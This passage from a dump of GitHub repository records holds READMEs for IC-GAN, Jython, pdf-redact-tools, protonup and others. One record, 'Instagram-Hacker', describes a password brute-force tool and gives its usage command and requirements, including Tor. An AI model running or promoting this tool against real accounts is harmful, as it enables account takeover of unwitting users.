| training dataset | resolution | url |\n|-------------------|-------------------|-------------------|---------------------|--------------------|--------------------|\n| IC-GAN | BigGAN | No | ImageNet | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_biggan_imagenet_res256.tar.gz) | \n| IC-GAN (half capacity) | BigGAN | No | ImageNet | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_biggan_imagenet_res256_halfcap.tar.gz) | \n| IC-GAN | BigGAN | No | ImageNet | 128x128 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_biggan_imagenet_res128.tar.gz) | \n| IC-GAN | BigGAN | No | ImageNet | 64x64 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_biggan_imagenet_res64.tar.gz) | \n| IC-GAN | BigGAN | Yes | ImageNet | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenet_res256.tar.gz) | \n| IC-GAN (half capacity) | BigGAN | Yes | ImageNet | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenet_res256_halfcap.tar.gz) | \n| IC-GAN | BigGAN | Yes | ImageNet | 128x128 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenet_res128.tar.gz) | \n| IC-GAN | BigGAN | Yes | ImageNet | 64x64 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenet_res64.tar.gz) | \n| IC-GAN | BigGAN | Yes | ImageNet-LT | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenetlt_res256.tar.gz) | \n| IC-GAN | BigGAN | Yes | ImageNet-LT | 128x128 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenetlt_res128.tar.gz) | \n| IC-GAN | BigGAN | Yes | ImageNet-LT | 64x64 | [model](https://dl.fbaipublicfiles.com/ic_gan/cc_icgan_biggan_imagenetlt_res64.tar.gz) | \n| IC-GAN | BigGAN | No | COCO-Stuff | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_biggan_coco_res256.tar.gz) | \n| IC-GAN | BigGAN | No | COCO-Stuff | 128x128 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_biggan_coco_res128.tar.gz) | \n| IC-GAN | StyleGAN2 | No | COCO-Stuff | 256x256 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_stylegan2_coco_res256.tar.gz) | \n| IC-GAN | StyleGAN2 | No | COCO-Stuff | 128x128 | [model](https://dl.fbaipublicfiles.com/ic_gan/icgan_stylegan2_coco_res128.tar.gz) | \n\n2) Execute: \n```\npython inference/generate_images.py --root_path [pretrained_models_path] --model [model] --model_backbone [backbone] --resolution [res]\n```\n* `model` can be chosen from `[\"icgan\", \"cc_icgan\"]` to use the IC-GAN or the class-conditional IC-GAN model respectively.\n* `backbone` can be chosen from `[\"biggan\", \"stylegan2\"]`.\n* `res` indicates the resolution at which the model has been trained. For ImageNet, choose one in `[64, 128, 256]`, and for COCO-Stuff, one in `[128, 256]`.\n\nThis script results in a .PNG file where several generated images are shown, given an instance feature (each row), and a sampled noise vector (each grid position).\n \nAdditional and optional parameters:\n* `index`: (None by default), is an integer from 0 to 999 that choses a specific instance feature vector out of the 1000 instances that have been selected with k-means on the ImageNet dataset and stored in `pretrained_models_path/stored_instances`.\n* `swap_target`: (None by default) is an integer from 0 to 999 indicating an ImageNet class label. 
This label will be used to condition the class-conditional IC-GAN, regardless of which instance features are being used.\n* `which_dataset`: (ImageNet by default) can be chosen from `[\"imagenet\", \"coco\"]` to indicate which dataset (training split) to sample the instances from. \n* `trained_dataset`: (ImageNet by default) can be chosen from `[\"imagenet\", \"coco\"]` to indicate the dataset in which the IC-GAN model has been trained on. \n* `num_imgs_gen`: (5 by default), it changes the number of noise vectors to sample per conditioning. Increasing this number results in a bigger .PNG file to save and load.\n* `num_conditionings_gen`: (5 by default), it changes the number of conditionings to sample. Increasing this number results in a bigger .PNG file to save and load.\n* `z_var`: (1.0 by default) controls the truncation factor for the generation. \n* Optionally, the script can be run with the following additional options `--visualize_instance_images --dataset_path [dataset_path]` to visualize the ground-truth images corresponding to the conditioning instance features, given a path to the dataset's ground-truth images `dataset_path`. Ground-truth instances will be plotted as the leftmost image for each row.\n\n## Data preparation \n
\n
#### ImageNet

1. Download dataset from here.
2. Download SwAV feature extractor weights from here.
3. Replace the paths in `data_utils/prepare_data.sh`: `out_path` by the path where hdf5 files will be stored, `path_imnet` by the path where ImageNet dataset is downloaded, and `path_swav` by the path where SwAV weights are stored.
4. Execute `./data_utils/prepare_data.sh imagenet [resolution]`, where `[resolution]` can be an integer in {64,128,256}. This script will create several hdf5 files:
    * `ILSVRC[resolution]_xy.hdf5` and `ILSVRC[resolution]_val_xy.hdf5`, where images and labels are stored for the training and validation set respectively.
    * `ILSVRC[resolution]_feats_[feature_extractor]_resnet50.hdf5` that contains the instance features for each image.
    * `ILSVRC[resolution]_feats_[feature_extractor]_resnet50_nn_k[k_nn].hdf5` that contains the list of `[k_nn]` neighbors for each of the instance features.
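If you want to sanity-check the hdf5 files written by `prepare_data.sh` (for ImageNet here, and likewise for the other datasets below), a small h5py loop is enough. The file name is just an example following the naming pattern above for resolution 256, and the internal dataset names are whatever the script writes, so they are listed rather than assumed:

```python
import h5py

# adjust the path to your out_path and resolution
with h5py.File("ILSVRC256_xy.hdf5", "r") as f:
    for name, dset in f.items():
        print(f"{name}: shape={dset.shape}, dtype={dset.dtype}")
```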

\n
\n\n
#### ImageNet-LT

1. Download ImageNet dataset from here. Following ImageNet-LT, the file `ImageNet_LT_train.txt` can be downloaded from this link and later stored in the folder `./BigGAN_PyTorch/imagenet_lt`.
2. Download the pre-trained weights of the ResNet on ImageNet-LT from this link, provided by the classifier-balancing repository.
3. Replace the paths in `data_utils/prepare_data.sh`: `out_path` by the path where hdf5 files will be stored, `path_imnet` by the path where ImageNet dataset is downloaded, and `path_classifier_lt` by the path where the pre-trained ResNet50 weights are stored.
4. Execute `./data_utils/prepare_data.sh imagenet_lt [resolution]`, where `[resolution]` can be an integer in {64,128,256}. This script will create several hdf5 files:
    * `ILSVRC[resolution]longtail_xy.hdf5`, where images and labels are stored for the training and validation set respectively.
    * `ILSVRC[resolution]longtail_feats_[feature_extractor]_resnet50.hdf5` that contains the instance features for each image.
    * `ILSVRC[resolution]longtail_feats_[feature_extractor]_resnet50_nn_k[k_nn].hdf5` that contains the list of `[k_nn]` neighbors for each of the instance features.

\n
\n\n
#### COCO-Stuff

1. Download the dataset following the LostGANs' repository instructions.
2. Download SwAV feature extractor weights from here.
3. Replace the paths in `data_utils/prepare_data.sh`: `out_path` by the path where hdf5 files will be stored, `path_imnet` by the path where ImageNet dataset is downloaded, and `path_swav` by the path where SwAV weights are stored.
4. Execute `./data_utils/prepare_data.sh coco [resolution]`, where `[resolution]` can be an integer in {128,256}. This script will create several hdf5 files:
    * `COCO[resolution]_xy.hdf5` and `COCO[resolution]_val_test_xy.hdf5`, where images and labels are stored for the training and evaluation set respectively.
    * `COCO[resolution]_feats_[feature_extractor]_resnet50.hdf5` that contains the instance features for each image.
    * `COCO[resolution]_feats_[feature_extractor]_resnet50_nn_k[k_nn].hdf5` that contains the list of `[k_nn]` neighbors for each of the instance features.

\n
\n\n
#### Other datasets

1. Download the corresponding dataset and store it in a folder `dataset_path`.
2. Download SwAV feature extractor weights from here.
3. Replace the paths in `data_utils/prepare_data.sh`: `out_path` by the path where hdf5 files will be stored and `path_swav` by the path where SwAV weights are stored.
4. Execute `./data_utils/prepare_data.sh [dataset_name] [resolution] [dataset_path]`, where `[dataset_name]` will be the dataset name, `[resolution]` can be an integer, for example 128 or 256, and `dataset_path` contains the dataset images. This script will create several hdf5 files:
    * `[dataset_name][resolution]_xy.hdf5`, where images and labels are stored for the training set.
    * `[dataset_name][resolution]_feats_[feature_extractor]_resnet50.hdf5` that contains the instance features for each image.
    * `[dataset_name][resolution]_feats_[feature_extractor]_resnet50_nn_k[k_nn].hdf5` that contains the list of `k_nn` neighbors for each of the instance features.

\n
\n\n\n
#### How to subsample an instance feature dataset with k-means

To downsample the instance feature vector dataset, after we have prepared the data, we can use the k-means algorithm:

`python data_utils/store_kmeans_indexes.py --resolution [resolution] --which_dataset [dataset_name] --data_root [data_path]`

* Adding `--gpu` allows the faiss library to compute k-means leveraging GPUs, resulting in faster execution.
* Adding the parameter `--feature_extractor [feature_extractor]` chooses which feature extractor to use, with `feature_extractor` in `['selfsupervised', 'classification']`, if we are using SwAV as the feature extractor or the ResNet pretrained on the classification task on ImageNet, respectively.
* The number of k-means clusters can be set with `--kmeans_subsampled [centers]`, where `centers` is an integer.
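Conceptually, the subsampling keeps the stored instance features that lie closest to k-means centroids. The snippet below is a rough faiss-based sketch of that idea, not the actual `store_kmeans_indexes.py` script; `feats` stands for the instance-feature matrix loaded from the `*_feats_*.hdf5` file and `k` for `--kmeans_subsampled`.

```python
import faiss
import numpy as np


def kmeans_subsample_indexes(feats: np.ndarray, k: int, use_gpu: bool = False) -> np.ndarray:
    """Return indexes of the k feature vectors closest to the k-means centroids."""
    feats = np.ascontiguousarray(feats, dtype="float32")
    kmeans = faiss.Kmeans(feats.shape[1], k, niter=20, gpu=use_gpu)
    kmeans.train(feats)
    # for each centroid, find the nearest stored feature vector
    index = faiss.IndexFlatL2(feats.shape[1])
    index.add(feats)
    _, nearest = index.search(kmeans.centroids, 1)
    return nearest.ravel()
```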
\n
\n
\n
\n\n## How to train the models\n\n#### BigGAN or StyleGAN2 backbone\nTraining parameters are stored in JSON files in `[backbone_folder]/config_files/[dataset]/*.json`, where `[backbone_folder]` is either BigGAN_Pytorch or stylegan2_ada_pytorch and `[dataset]` can either be ImageNet, ImageNet-LT or COCO_Stuff.\n```\ncd BigGAN_PyTorch\npython run.py --json_config config_files//.json --data_root [data_root] --base_root [base_root]\n```\nor \n```\ncd stylegan_ada_pytorch\npython run.py --json_config config_files//.json --data_root [data_root] --base_root [base_root]\n```\nwhere:\n* `data_root` path where the data has been prepared and stored, following the previous section (Data preparation). \n* `base_root` path where to store the model weights and logs.\n\n\nNote that one can create other JSON files to modify the training parameters.\n\n#### Other backbones\nTo be able to run IC-GAN with other backbones, we provide some orientative steps:\n* Place the new backbone code in a new folder under `ic_gan` (`ic_gan/new_backbone`).\n* Modify the relevant piece of code in the GAN architecture to allow instance features as conditionings (for both generator and discriminator). \n* Create a `trainer.py` file with the training loop to train an IC-GAN with the new backbone. The `data_utils` folder provides the tools to prepare the dataset, load the data and conditioning sampling to train an IC-GAN. The IC-GAN with BigGAN backbone [`trainer.py`](BigGAN_PyTorch/trainer.py) file can be used as an inspiration.\n\n\n \n## How to test the models\nTo obtain the FID and IS metrics on ImageNet and ImageNet-LT: \n1) Execute:\n``` \npython inference/test.py --json_config [BigGAN-PyTorch or stylegan-ada-pytorch]/config_files//.json --num_inception_images [num_imgs] --sample_num_npz [num_imgs] --eval_reference_set [ref_set] --sample_npz --base_root [base_root] --data_root [data_root] --kmeans_subsampled [kmeans_centers] --model_backbone [backbone]\n```\nTo obtain the tensorflow IS and FID metrics, use an environment with the Python <3.7 and Tensorflow 1.15. Then:\n\n2) Obtain Inception Scores and pre-computed FID moments:\n ``` \n python ../data_utils/inception_tf13.py --experiment_name [exp_name] --experiment_root [base_root] --kmeans_subsampled [kmeans_centers] \n ```\n\nFor stratified FIDs in the ImageNet-LT dataset, the following parameters can be added `--which_dataset 'imagenet_lt' --split 'val' --strat_name [stratified_split]`, where `stratified_split` can be in `[few,low, many]`.\n \n3) (Only needed once) Pre-compute reference moments with tensorflow code:\n ```\n python ../data_utils/inception_tf13.py --use_ground_truth_data --data_root [data_root] --split [ref_set] --resolution [res] --which_dataset [dataset]\n ```\n\n4) (Using this [repository](https://github.com/bioinf-jku/TTUR)) FID can be computed using the pre-computed statistics obtained in 2) and the pre-computed ground-truth statistics obtain in 3). 
For example, to compute the FID with reference ImageNet validation set: \n```python TTUR/fid.py [base_root]/[exp_name]/TF_pool_.npz [data_root]/imagenet_val_res[res]_tf_inception_moments_ground_truth.npz ``` \n\nTo obtain the FID metric on COCO-Stuff:\n1) Obtain ground-truth jpeg images: ```python data_utils/store_coco_jpeg_images.py --resolution [res] --split [ref_set] --data_root [data_root] --out_path [gt_coco_images] --filter_hd [filter_hd] ```\n2) Store generated images as jpeg images: ```python sample.py --json_config ../[BigGAN-PyTorch or stylegan-ada-pytorch]/config_files//.json --data_root [data_root] --base_root [base_root] --sample_num_npz [num_imgs] --which_dataset 'coco' --eval_instance_set [ref_set] --eval_reference_set [ref_set] --filter_hd [filter_hd] --model_backbone [backbone] ```\n3) Using this [repository](https://github.com/bioinf-jku/TTUR), compute FID on the two folders of ground-truth and generated images.\n\nwhere:\n* `dataset`: option to select the dataset in `['imagenet', 'imagenet_lt', 'coco']\n* `exp_name`: name of the experiment folder.\n* `data_root`: path where the data has been prepared and stored, following the previous section [\"Data preparation\"](#data-preparation). \n* `base_root`: path where to find the model (for example, where the pretrained models have been downloaded). \n* `num_imgs`: needs to be set to 50000 for ImageNet and ImageNet-LT (with validation set as reference) and set to 11500 for ImageNet-LT (with training set as reference). For COCO-Stuff, set to 75777, 2050, 675, 1375 if using the training, evaluation, evaluation seen or evaluation unseen set as reference.\n* `ref_set`: set to `'val'` for ImageNet, ImageNet-LT (and COCO) to obtain metrics with the validation (evaluation) set as reference, or set to `'train'` for ImageNet-LT or COCO to obtain metrics with the training set as reference.\n* `kmeans_centers`: set to 1000 for ImageNet and to -1 for ImageNet-LT. \n* `backbone`: model backbone architecture in `['biggan','stylegan2']`.\n* `res`: integer indicating the resolution of the images (64,128,256).\n* `gt_coco_images`: folder to store the ground-truth JPEG images of that specific split.\n* `filter_hd`: only valid for `ref_set=val`. If -1, use the entire evaluation set; if 0, use only conditionings and their ground-truth images with seen class combinations during training (eval seen); if 1, use only conditionings and their ground-truth images with unseen class combinations during training (eval unseen). \n\n\n## Utilities for GAN backbones\nWe change and provide extra utilities to facilitate the training, for both BigGAN and StyleGAN2 base repositories.\n\n### BigGAN change log\nThe following changes were made:\n\n* BigGAN architecture:\n * In `train_fns.py`: option to either have the optimizers inside the generator and discriminator class, or directly in the `G_D` wrapper module. Additionally, added an option to augment both generated and real images with augmentations from [DiffAugment](https://github.com/mit-han-lab/data-efficient-gans).\n * In `BigGAN.py`: added a function `get_condition_embeddings` to handle the conditioning separately.\n * Small modifications to `layers.py` to adapt the batchnorm function calls to the pytorch 1.8 version. 
\n \n* Training utilities: \n * Added `trainer.py` file (replacing train.py):\n * Training now allows the usage of DDP for faster single-node and multi-node training.\n * Training is performed by epochs instead of by iterations.\n * Option to stop the training by using early stopping or when experiments diverge. \n * In `utils.py`:\n * Replaced `MultiEpochSampler` for `CheckpointedSampler` to allow experiments to be resumable when using epochs and fixing a bug where `MultiEpochSampler` would require a long time to fetch data permutations when the number of epochs increased.\n * ImageNet-LT: Added option to use different class distributions when sampling a class label for the generator.\n * ImageNet-LT: Added class balancing (uniform and temperature annealed).\n * Added data augmentations from [DiffAugment](https://github.com/mit-han-lab/data-efficient-gans).\n\n* Testing utilities:\n * In `calculate_inception_moments.py`: added option to obtain moments for ImageNet-LT dataset, as well as stratified moments for many, medium and few-shot classes (stratified FID computation).\n * In `inception_utils.py`: added option to compute [Precision, Recall, Density, Coverage](https://github.com/clovaai/generative-evaluation-prdc) and stratified FID.\n \n* Data utilities:\n * In `datasets.py`, added option to load ImageNet-LT dataset.\n * Added ImageNet-LT.txt files with image indexes for training and validation split. \n * In `utils.py`: \n * Separate functions to obtain the data from hdf5 files (`get_dataset_hdf5`) or from directory (`get_dataset_images`), as well as a function to obtain only the data loader (`get_dataloader`). \n * Added the function `sample_conditionings` to handle possible different conditionings to train G with.\n \n* Experiment utilities:\n * Added JSON files to launch experiments with the proposed hyper-parameter configuration.\n * Script to launch experiments with either the [submitit tool](https://github.com/facebookincubator/submitit) or locally in the same machine (run.py). \n\n### StyleGAN2 change log \n
\n
    \n
* Multi-node DistributedDataParallel training.
* Added early stopping based on the training FID metric.
* Automatic checkpointing when jobs are automatically rescheduled on a cluster.
* Option to load dataset from hdf5 file.
* Replaced the usage of Click python package by an `ArgumentParser`.
* Only saving best and last model weights.
\n
\n\n## Acknowledgements\nWe would like to thanks the authors of the [Pytorch BigGAN repository](https://github.com/ajbrock/BigGAN-PyTorch) and [StyleGAN2 Pytorch](https://github.com/NVlabs/stylegan2-ada-pytorch), as our model requires their repositories to train IC-GAN with BigGAN or StyleGAN2 bakcbone respectively. \nMoreover, we would like to further thank the authors of [generative-evaluation-prdc](https://github.com/clovaai/generative-evaluation-prdc), [data-efficient-gans](https://github.com/mit-han-lab/data-efficient-gans), [faiss](https://github.com/facebookresearch/faiss) and [sg2im](https://github.com/google/sg2im) as some components were borrowed and modified from their code bases. Finally, we thank the author of [WanderCLIP](https://colab.research.google.com/github/eyaler/clip_biggan/blob/main/WanderCLIP.ipynb) as well as the following repositories, that we use in our Colab notebook: [pytorch-pretrained-BigGAN](https://github.com/huggingface/pytorch-pretrained-BigGAN) and [CLIP](https://github.com/openai/CLIP).\n\n## License\nThe majority of IC-GAN is licensed under CC-BY-NC, however portions of the project are available under separate license terms: BigGAN and [PRDC](https://github.com/facebookresearch/ic_gan/blob/main/data_utils/compute_pdrc.py) are licensed under the MIT license; [COCO-Stuff loader](https://github.com/facebookresearch/ic_gan/blob/main/data_utils/cocostuff_dataset.py) is licensed under Apache License 2.0; [DiffAugment](https://github.com/facebookresearch/ic_gan/blob/main/BigGAN_PyTorch/diffaugment_utils.py) is licensed under BSD 2-Clause Simplified license; StyleGAN2 is licensed under a NVIDIA license, available here: https://github.com/NVlabs/stylegan2-ada-pytorch/blob/main/LICENSE.txt. In the Colab notebook, [CLIP](https://github.com/openai/CLIP) and [pytorch-pretrained-BigGAN](https://github.com/huggingface/pytorch-pretrained-BigGAN) code is used, both licensed under the MIT license.\n\n## Disclaimers\nTHE DIFFAUGMENT SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nTHE CLIP SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\nTHE PYTORCH-PRETRAINED-BIGGAN SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n## Cite the paper\nIf this repository, the paper or any of its content is useful for your research, please cite:\n```\n@inproceedings{casanova2021instanceconditioned,\n title={Instance-Conditioned GAN}, \n author={Arantxa Casanova and Marl\u00e8ne Careil and Jakob Verbeek and Michal Drozdzal and Adriana Romero-Soriano},\n booktitle={Advances in Neural Information Processing Systems (NeurIPS)},\n year={2021}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "malllabiisc/CompGCN", "link": "https://github.com/malllabiisc/CompGCN", "tags": ["link-prediction", "relation-embeddings", "iclr2020", "graph-convolutional-networks", "deep-learning", "pytorch", "graph-representation-learning"], "stars": 514, "description": "ICLR 2020: Composition-Based Multi-Relational Graph Convolutional Networks", "lang": "Python", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jython/frozen-mirror", "link": "https://github.com/jython/frozen-mirror", "tags": [], "stars": 514, "description": "A Mirror of hg.python.org (now frozen). Please use jython/jython.", "lang": "Python", "repo_lang": "", "readme": "Jython: Python for the Java Platform\n------------------------------------\n\nWelcome to Jython @jython.version@.\n@snapshot.banner@\nThis is @readme.release@ release of version @jython.version.short@ of Jython.\n\nAlong with language and runtime compatibility with CPython 2.7, Jython 2.7\nprovides substantial support of the Python ecosystem. This includes built-in\nsupport of pip/setuptools (you can use with bin/pip) and a native launcher\nfor Windows (bin/jython.exe).\n\nJim Baker presented a talk at PyCon 2015 about Jython 2.7, including demos\nof new features: https://www.youtube.com/watch?v=hLm3garVQFo\n\nThis release was compiled on @os.name@ using @java.vendor@ Java\nversion @java.version@ and requires a minimum of Java @jdk.target.version@ to run.\n\nSee ACKNOWLEDGMENTS for details about Jython's copyright, license,\ncontributors, and mailing lists; and NEWS for detailed release notes,\nincluding bugs fixed, backwards breaking changes, and new features.\n\nThe developers extend their thanks to all who contributed to this release\nof Jython, through bug reports, patches, pull requests, documentation\nchanges, email and conversation in any media. We are grateful to the PSF for\ncontinuing practical help and support to the project.\n\nTesting\n-------\nYou can test your installation of Jython (not the standalone jar) by\nrunning the regression tests, with the command:\n\njython -m test.regrtest -e\n\nThe regression tests can take about fifty minutes. 
At the time of writing,\nthese tests are known to fail (spuriously) on an installed Jython:\n test___all__\n test_java_visibility\n test_jy_internals\n test_ssl_jy\nPlease report reproducible failures at http://bugs.jython.org .\n\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "importCTF/Instagram-Hacker", "link": "https://github.com/importCTF/Instagram-Hacker", "tags": ["hacking", "hacking-tool", "instagram", "python", "bruteforce", "bruteforce-attacks"], "stars": 514, "description": "This is an advanced script for Instagram bruteforce attacks. WARNING THIS IS A REAL TOOL!", "lang": "Python", "repo_lang": "", "readme": "# Instagram-Hacker\nThis is a script for Instagram bruteforce attacks. WARNING THIS IS A REAL TOOL!\n\n# Usage\n\n`python instagram.py username103 pass.lst`\n\n# Requirements\n\n[mechanize](https://pypi.python.org/pypi/mechanize/) install with: `pip install mechanize`\n\n[requests](https://pypi.python.org/pypi/requests/2.18.4) install with: `pip install requests`\n\n[Tor](https://www.torproject.org/docs/debian) install with: `sudo apt-get install tor`\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "firstlookmedia/pdf-redact-tools", "link": "https://github.com/firstlookmedia/pdf-redact-tools", "tags": [], "stars": 514, "description": "a set of tools to help with securely redacting and stripping metadata from documents before publishing", "lang": "Python", "repo_lang": "", "readme": "# PDF Redact Tools\n\n_Warning: This project is no longer maintained. A much better tool is [dangerzone](https://dangerzone.rocks)._\n\n![PDF Redact Tools](/logo.png)\n\nPDF Redact Tools helps with securely redacting and stripping metadata from documents before publishing.\n\n*Warning:* PDF Redact Tools uses ImageMagick to parse PDFs. While ImageMagick is a versatile tool, it has a history of some [terrible](https://imagetragick.com/) security bugs. A malicious PDF could exploit a bug in ImageMagick to take over your computer. If you're working with potentially malicious PDFs, it's safest to run them through PDF Redact Tools in an isolated environment, such as a virtual machine, or by using a tool such as the [Qubes PDF Converter](https://github.com/QubesOS/qubes-app-linux-pdf-converter) instead.\n\n## Quick Start\n\n### Mac OS X\n\n* Install [Homebrew](http://brew.sh/)\n* Open a terminal and type `$ brew install pdf-redact-tools`\n\n### Ubuntu\n\nYou can install PDF Redact Tools from this Ubuntu PPA:\n\n```sh\n$ sudo add-apt-repository ppa:micahflee/ppa\n$ sudo apt-get update\n$ sudo apt-get install pdf-redact-tools\n```\n\n### Other\n\nPDF Redact Tools isn't yet packaged in any GNU/Linux distributions yet, however it's easy to install by following the [build instructions](/BUILD.md). I haven't attempted to make this work in Windows.\n\n## How to Use\n\nTo use it, convert your original document to a PDF.\n\nThen start by exploding the PDF into PNG files:\n\n```sh\n$ pdf-redact-tools --explode example_document.pdf\n```\n\nThis will create a new folder in the same directory as the PDF called (in this case) `example_document_pages`, with a PNG for each page.\n\nEdit each page that needs redacting in graphics editing software like GIMP or Photoshop. Note that opening, editing, and saving a PNG will likely make it look slightly different than the other PNGs. 
For best results, open all PNGs and simply save and close the pages you don't need to edit.\n\nWhen you're done, combine the PNGs back into a flattened, informationless PDF:\n\n```sh\n$ pdf-redact-tools --merge example_document.pdf\n```\n\nIn this case, the final redacted PDF is called `example_document-final.pdf`.\n\nIf you don't need to redact anything, but you just want a new PDF that definitely doesn't contain malware or metadata, you can simply sanitize it.\n\n```sh\n$ pdf-redact-tools --sanitize untrusted.pdf\n```\n\nThe final document that you can trust is called `untrusted-final.pdf`.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "AUNaseef/protonup", "link": "https://github.com/AUNaseef/protonup", "tags": ["proton", "proton-ge-custom", "linux", "steam", "automation", "python"], "stars": 514, "description": "Install and Update Proton-GE", "lang": "Python", "repo_lang": "", "readme": "## Introduction\nCLI program and API to automate the installation and update of [GloriousEggroll](https://github.com/GloriousEggroll/)'s [Proton-GE](https://github.com/GloriousEggroll/proton-ge-custom)\n\n[![Downloads](https://pepy.tech/badge/protonup)](https://pepy.tech/project/protonup)\n\n## Installation\nInstall from Python Package Index\n```\npip3 install protonup\n```\nInstall from source\n```\ngit clone https://github.com/AUNaseef/protonup && cd protonup\npython3 setup.py install --user\n```\nIf you get a `command not found` error, add the following to your `~/.profile` (if it's not already present) and run `source ~/.profile`\n```\nif [ -d \"$HOME/.local/bin\" ] ; then\n PATH=\"$HOME/.local/bin:$PATH\"\nfi\n```\n\n## Usage\nSet your installation directory before running the program with `-d \"your/compatibilitytools.d/directory\"`\n\nExample:\n```\nprotonup -d \"~/.steam/root/compatibilitytools.d/\"\n```\n---\nTo update to the latest version, just run `protonup` from a command line\n\nExample:\n```\nprotonup\n```\n---\nList available versions with `--releases`\n\nExample:\n```\nprotonup --releases\n```\n---\nInstall a specific version with `-t \"version tag\"`\n\nExample:\n```\nprotonup -t 6.5-GE-2\n```\n---\nBy default the downloads are stored in a temporary folder. Change it with `-o \"custom/download/directory\"`\n\nExample:\n```\nprotonup -o ~/Downloads\n```\n---\nList existing installations with `-l`\n\nExample:\n```\nprotonup -l\n```\n---\nRemove existing installations with `-r \"version tag`\n\nExample:\n```\nprotonup -r 6.5-GE-2\n```\n---\nUse `--download` to download Proton-GE to the current working directory without installing it, you can override destination with `-o`\n\nExample:\n```\nprotonup --download\n```\n---\nUse `-y` toggle to carry out actions without any logging or interaction\n\nExample:\n```\nprotonup --download -o ~/Downloads -y\n```\n---\n### Restart Steam after making changes\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bai-shang/crnn_ctc_ocr_tf", "link": "https://github.com/bai-shang/crnn_ctc_ocr_tf", "tags": [], "stars": 513, "description": "Extremely simple implement for CRNN by Tensorflow", "lang": "Python", "repo_lang": "", "readme": "# crnn_ctc_ocr_tf\nThis software implements the Convolutional Recurrent Neural Network (CRNN), a combination of CNN, RNN and CTC loss for image-based sequence recognition tasks, such as scene text recognition and OCR. 
\n\nhttps://arxiv.org/abs/1507.05717 \n\nMore details for CRNN and CTC loss (in chinese): https://zhuanlan.zhihu.com/p/43534801 \n\n![](https://github.com/bai-shang/crnn_ctc_ocr_tf/blob/master/Arch.jpg?raw=true)\n\n***The crnn+seq2seq+attention ocr code can be found here [bai-shang/crnn_seq2seq_ocr_pytorch](https://github.com/bai-shang/crnn_seq2seq_ocr_pytorch)***\n\n# Dependencies\nAll dependencies should be installed are as follow: \n* Python3\n* tensorflow==1.15.0\n* opencv-python\n* numpy\n\nRequired packages can be installed with\n```bash\npip3 install -r requirements.txt\n``` \n\nNote: This code cannot run on the tensorflow2.0 since it's modified the 'tf.nn.ctc_loss' API.\n\n# Run demo\n\nAsume your current work directory is \"crnn_ctc_ocr_tf\"\uff1a\n```bash\ncd path/to/your/crnn_ctc_ocr_tf/\n```\nDowload pretrained model and extract it to your disc: [GoogleDrive](https://drive.google.com/file/d/1A3V7o3SKSiL3IHcTqc1jP4w58DuC8F9o/view?usp=sharing) . \n\nExport current work directory path into PYTHONPATH: \n\n```bash\nexport 